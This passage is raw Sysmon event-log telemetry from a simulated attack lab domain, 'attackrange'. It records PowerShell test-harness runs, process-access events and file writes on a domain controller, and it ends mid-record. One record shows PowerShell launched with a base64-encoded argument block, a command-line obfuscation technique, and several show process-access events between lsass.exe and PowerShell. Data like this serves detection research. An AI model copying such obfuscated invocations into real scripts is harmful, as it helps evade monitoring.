22:55:46.664{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.915{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.663{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.521{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.521{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001697605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:38.482{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51662- 10341000x80000000000000001697604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.474{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.474{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:46.465{05ADC7E1-70F2-603D-7788-00000000AD01}6552\PSHost.132591129463727220.6552.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.443{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_1alb0s1q.a4v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.443{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_dogzkbeo.uc4.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.427{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_dogzkbeo.uc4.ps12021-03-01 22:55:46.427 10341000x80000000000000001697598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.411{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.374{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.374{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.374{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.374{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.373{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.373{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.373{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.372{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.372{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001697588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.371{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.370{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.333{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=51C037069F88A4BF496FD4FAFBB90906,SHA256=2C3DA6CF4C632C81A7A39251892EAA395FC58A46FED0753408E471316EA5353A,IMPHASH=00000000000000000000000000000000falsetrue 154100x80000000000000001697811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.997{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EA PABPAGIAagBzACAAVgBlAHIAcwBpAG8AbgA9ACIAMQAuADEALgAwAC4AMQAiACAAeABtAGwAbgBzAD0AIgBoAHQAdABwADoALwAvAHMAYwBoAGUAbQBhAHMALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AcABvAHcAZQByAHMAaABlAGwAbAAvADIAMAAwADQALwAwADQAIgA+AA0ACgAgACAAPABPAGIAagAgAFIAZQBmAEkAZAA9ACIAMAAiAD4ADQAKACAAIAAgACAAPABUAE4AIABSAGUAZgBJAGQAPQAiADAAIgA+AA0ACgAgACAAIAAgACAAIAA8AFQAPgBTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEEAcgByAGEAeQBMAGkAcwB0ADwALwBUAD4ADQAKACAAIAAgACAAIAAgADwAVAA+AFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAPAAvAFQAPgANAAoAIAAgACAAIAA8AC8AVABOAD4ADQAKACAAIAAgACAAPABMAFMAVAA+AA0ACgAgACAAIAAgACAAIAA8AFMAPgA4AGQANgAyADUAZAA3AGUALQA5ADUAOABkAC0ANAA0ADgANwAtADkAMAAwADcALQA5AGUAZQBhADMAOQBhADEANQBjAGEAZgA8AC8AUwA+AA0ACgAgACAAIAAgADwALwBMAFMAVAA+AA0ACgAgACAAPAAvAE8AYgBqAD4ADQAKADwALwBPAGIAagBzAD4A -C Write-Host $args[0]C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe 23542300x80000000000000001697810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.896{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\tmp7B0.tmpMD5=330E99088842C792003DE6CF5675BEF4,SHA256=B0F1AAA1D0DF1BC4963F06098DB2A723043F39E2FF24B9F0BB8D7B996BBDB2EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.874{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\tmp7B0.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.818{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A44E340F1D09DC82983F06B1578AFBA2,SHA256=437E922365E108CB53A5878813D86C06365C04B9E2D0A8189D06DBED7C2BA96C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71C99D8CAFB3180176BF990D679B80FD,SHA256=DCA51B08D048D1791A75A7139B10BDACD92737AD9341729D3EA036D5E02DBC6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F525A4FD70420D658F3BE15ADF5FD331,SHA256=B68A6D93A88040263BCFEF3E6B973636D0263B2D741CBA96E2AC45BE97B4EB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.740{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=927839BF2879C39F2220C20D2E793ED2,SHA256=D918A32F3AC7565562F5B00B3C3421950E67E54A6CA50118D461D5F17A1CAC58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.724{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 